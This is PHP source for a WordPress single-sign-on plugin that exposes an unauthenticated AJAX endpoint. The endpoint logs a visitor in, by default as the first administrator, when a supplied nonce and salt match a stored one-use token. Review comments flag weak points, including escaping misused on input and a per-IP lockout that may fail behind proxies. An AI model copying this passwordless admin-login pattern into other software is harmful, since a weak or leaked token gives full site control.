<?php
/**
 * Plugin Name: SSO
 * Author: Garth Mortensen, Mike Hansen
 * Version: 0.4
 * License: GPLv2 or later
 * License URI: http://www.gnu.org/licenses/gpl-2.0.html
 */

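/**
 * AJAX handler for the `sso-check` action.
 *
 * Logs a user in when the request's `nonce` and `salt` query parameters produce the
 * same digest as the value stored in the `sso_token` transient. The transient is
 * deleted on success, so a token is accepted at most once.
 *
 * Query parameters read:
 *  - nonce, salt: required; concatenated and hashed to form the candidate token.
 *  - user:        optional e-mail address or numeric ID; when absent, the first user
 *                 with the `administrator` role is used.
 *  - bounce:      optional path handed to admin_url() for the post-login redirect.
 *
 * Every path ends the request; the function never returns to its caller.
 */
function sso_check() {
    $has_credentials = isset( $_GET['salt'], $_GET['nonce'] )
        && is_string( $_GET['salt'] )
        && is_string( $_GET['nonce'] );

    // wp_safe_redirect() only queues the Location header, so the request must be
    // terminated here. Without this, a client that is missing parameters or is
    // already locked out would still reach the token comparison below.
    if ( ! $has_credentials || sso_check_blocked() ) {
        sso_req_login();
        die();
    }

    // NOTE(review): esc_attr() is an output-escaping helper, not an input sanitizer.
    // It is kept so the digest input stays byte-compatible with whatever issues the
    // token; confirm against the issuer before replacing it.
    $nonce = esc_attr( $_GET['nonce'] );
    $salt  = esc_attr( $_GET['salt'] );

    if ( ! empty( $_GET['user'] ) ) {
        // Reject array-style parameters (user[]=...) instead of passing them on.
        if ( ! is_string( $_GET['user'] ) ) {
            sso_req_login();
            die();
        }
        $user = esc_attr( $_GET['user'] );
    } else {
        // No user requested: fall back to the first administrator account, or 0
        // (which resolves to no user below) when none is returned.
        $admins = get_users( array( 'role' => 'administrator', 'number' => 1 ) );
        if ( is_array( $admins ) && isset( $admins[0] ) && is_a( $admins[0], 'WP_User' ) ) {
            $user = $admins[0]->ID;
        } else {
            $user = 0;
        }
    }

    $bounce = ( ! empty( $_GET['bounce'] ) && is_string( $_GET['bounce'] ) ) ? $_GET['bounce'] : '';

    // Candidate token: base64 of the hex SHA-256 digest, truncated to 64 characters.
    $hash = base64_encode( hash( 'sha256', $nonce . $salt, false ) );
    $hash = substr( $hash, 0, 64 );

    // get_transient() returns false when no token is pending. Require a string and
    // compare in constant time rather than with the type-juggling `==` operator.
    $expected = get_transient( 'sso_token' );

    if ( is_string( $expected ) && hash_equals( $expected, $hash ) ) {
        if ( is_email( $user ) ) {
            $user = get_user_by( 'email', $user );
        } else {
            $user = get_user_by( 'id', (int) $user );
        }
        if ( is_a( $user, 'WP_User' ) ) {
            wp_set_current_user( $user->ID, $user->user_login );
            wp_set_auth_cookie( $user->ID );
            do_action( 'wp_login', $user->user_login, $user );
            // Single use: drop the token as soon as it has been honoured.
            delete_transient( 'sso_token' );
            wp_safe_redirect( admin_url( $bounce ) );
        } else {
            sso_req_login();
        }
    } else {
        // Wrong or missing token: count it against this client before redirecting.
        sso_add_failed_attempt();
        sso_req_login();
    }
    die();
}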

// Expose the handler on both AJAX hooks: the `nopriv` variant serves requests from
// visitors who are not logged in, the other serves already-authenticated users.
foreach ( array( 'wp_ajax_nopriv_sso-check', 'wp_ajax_sso-check' ) as $sso_hook ) {
    add_action( $sso_hook, 'sso_check' );
}
unset( $sso_hook );

/**
 * Redirect the client to the standard WordPress login page.
 *
 * This only issues the redirect; it does not end the request, so a caller that
 * must not continue processing has to stop execution itself afterwards.
 */
function sso_req_login() {
    $login_url = wp_login_url();
    wp_safe_redirect( $login_url );
}

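/**
 * Build the transient name under which failed attempts for the current client are counted.
 *
 * The name is derived from a validated REMOTE_ADDR and hashed so that it is always a
 * fixed-length, non-empty string. The previous implementation passed the address
 * through esc_url(), a URL escaper that is not guaranteed to return a distinct,
 * non-empty value for input that is not a URL (IPv6 literals in particular), which
 * risks several clients sharing one counter.
 *
 * NOTE(review): REMOTE_ADDR is the directly connected peer. If the site is served
 * through a reverse proxy or CDN, all visitors may map to the same counter; confirm
 * against the deployment.
 *
 * @return string Transient name, `sso` followed by a SHA-256 hex digest.
 */
function sso_get_attempt_id() {
    $remote = isset( $_SERVER['REMOTE_ADDR'] ) && is_string( $_SERVER['REMOTE_ADDR'] )
        ? $_SERVER['REMOTE_ADDR']
        : '';

    // Anything that is not a well-formed IP address lands in one shared bucket.
    if ( false === filter_var( $remote, FILTER_VALIDATE_IP ) ) {
        $remote = 'unknown';
    }

    return 'sso' . hash( 'sha256', $remote );
}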

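/**
 * Record one failed SSO attempt for the current client.
 *
 * The counter lives in a transient that expires 300 seconds after the most recent
 * failure, so each new failure restarts the window.
 */
function sso_add_failed_attempt() {
    $key = sso_get_attempt_id();

    // get_transient() returns false when no counter exists yet, and PHP's ++ operator
    // leaves booleans unchanged, so the first failure was never counted and the
    // lockout could not trigger. Cast to int before adding.
    $attempts = (int) get_transient( $key ) + 1;

    set_transient( $key, $attempts, 300 );
}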

/**
 * Tell whether the current client has exceeded the failed-attempt limit.
 *
 * @return bool True once more than four failures are recorded for this client.
 */
function sso_check_blocked() {
    // The second argument is not part of get_transient()'s signature and is ignored.
    $failures = get_transient( sso_get_attempt_id(), 0 );

    return $failures > 4;
}
